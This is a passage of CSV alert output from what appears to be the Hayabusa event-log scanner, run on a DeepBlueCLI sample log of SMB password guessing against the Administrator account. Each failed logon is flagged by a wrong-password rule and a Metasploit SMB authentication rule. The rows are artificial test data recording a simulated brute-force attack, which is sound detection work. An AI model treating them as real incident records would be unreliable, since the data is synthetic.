NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
